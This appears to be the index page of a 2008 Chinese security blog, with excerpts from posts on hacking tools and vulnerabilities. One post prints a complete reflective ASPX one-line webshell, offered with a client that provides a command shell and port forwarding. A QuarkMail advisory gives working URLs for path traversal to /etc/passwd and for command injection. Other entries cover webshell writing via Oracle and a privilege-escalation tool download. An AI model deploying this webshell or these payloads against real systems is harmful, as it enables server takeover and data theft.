鬼仔's Blog

新型 .net 一句话及客户端

2008/10/13 19:26 | 鬼仔 | 工具收集 | 才 1 条评论

鬼仔注：刚从外面回来，看到cnqing在gtalk上给我的留言，只扔给一个链接。

作者：cnqing

软件说明：
程序包包括一个基于反射的.net 一句话木马。

<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["psw"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

客户端当前插件
文件管理
.net探针
CMDshell
端口转发
阅读全文 »

Tags: ASP.Net, ASPX, ASPXshell, 一句话马

CSRF with Flash

2008/10/13 13:36 | 鬼仔 | 技术文章 | 才 1 条评论

Author: lake2 [80sec]
EMail: lake2#80sec.com
Site: http://www.80sec.com
Date: 2008-10-04
From: http://www.80sec.com/release/csrf-with-flash.txt
———————————

[ 目录 ]

0×00 纯属扯淡
0×01 用flash发起CSRF攻击
0×02 超越JavaScript Hijacking
0×03 flash的跨域策略
0×04 绕过flash的跨域策略
0×05 flash的限制措施
0×06 Windows Media Player的隐患
0×07 防范措施
0×08 后记
阅读全文 »

Tags: CSRF, Flash

NTFS之HARDLINK攻防第二版

2008/10/13 13:33 | 鬼仔 | 技术文章 | 3 条评论了已经

作者：MJ0011

Hardlink 之文件蹲坑~

首先用oo.exe蹲坑一个文件 c:\1.txt~
可以看到文件打不开了~
阅读全文 »

Tags: HARDLINK, NTFS

NTFS之HARDLINK攻防

2008/10/13 13:27 | 鬼仔 | 技术文章 | 消灭0留言

作者：MJ0011

爆老技术啊爆老技术~

NTFS支持一种HARDLINK技术，可以将两个文件“硬连接”起来，其实原理很简单，两个文件共享同样的fie record，操作一个文件相当与操作另一个文件，包括相关属性，删除其中一个，另一个会保留原有的数据存在~

可使用系统工具fsutil.exe来创建一个硬连接，也可以使用windows提供的相关API、FSCTL来实现

fsutil hardlink create c:\1.txt c:\2.txt，即可建立c:\2.txt的连接,c:\1.txt
阅读全文 »

Tags: HARDLINK, NTFS

关于Windows的权限和一些安全问题

2008/10/13 13:21 | 鬼仔 | 技术文章 | 才 1 条评论

作者：刺

让我们来复习一篇我在6、7年前写的文章，真实时间已经不可考了，因为我也忘记了。

当时写这篇文章的目的是为了学习和研究NT下权限带来的一些安全问题，不过我当时没有深入进行下去。

最近出的exploit: Windows 2003 Server Token Kidnapping 问题，又是这方面的问题，与SeImpersonatePrivilege和token关系紧密。

其实NT核心里的 权限—令牌—ACL 这一体系还会有很多其他的问题，以往深究的人很少，如果想研究下去的话，可以参考下我下面这篇文章。研究方法应该类似。
阅读全文 »

Tags: Windows, 权限

快客电邮(QuarkMail)远程命令执行漏洞

2008/10/12 16:54 | 鬼仔 | 技术文章 | 2 条评论了已经

来源：80sec

漏洞说明：快客电邮（QuarkMail）是北京雄智伟业科技公司推出的电子邮件系统，被广泛用于各个领域的电子邮件解决方案，其webmail部分使用perl cgi编写，但是80sec在其系统中发现一个重大的安全漏洞，导致远程用户可以在邮件系统上以当前进程身份执行任意命令，从而进一步控制主机或者系统。

漏洞厂商：http://www.ipmotor.com/

漏洞解析：QuarkMail错误地使用perl的open函数以打开文件，实现模板等功能，但是其对用户传入的参数没有做有效的过滤，从而导致一个命令执行漏洞。

漏洞证明：登录进入系统之后访问如下URL

http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inbox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../ etc/passwd%00&id=2&sort=0&read_flag=yes

即可得到系统账户文件，访问如下URL

http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inbox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../usr/bin/id|%00&id=2&sort=0&read_flag=yes

即可以将/usr/bin/id文件打开执行，并且将结果返回，用户就可以利用一序列操作获得系统的完整访问权。

漏洞解决：请等待官方补丁。

Tags: QuarkMail, 漏洞

ORACLE 建立数据文件WriteWebShell

2008/10/12 15:39 | 鬼仔 | 技术文章 | 消灭0留言

作者： kj021320

转载请注明出处

其实类似ORACLE 这样强大的数据库，真没必要用到这么土的办法

SQLJ 存储过程写文件也可以，逼于无奈对方机器不支持SQLJ 还有 UTL_FILE包也被干掉了？

那也可以使用以下我说的这个方式
阅读全文 »

Tags: Oracle, WebShell

Dbshell

2008/10/12 15:36 | 鬼仔 | 工具收集 | 7 条评论了已经

来源：WEB安全手册

DB_OWNER权限备份hta到启动项提权的小工具。

下载地址：http://dl.getdropbox.com/u/216079/dbshell.exe

Tags: DB_OWNER, hta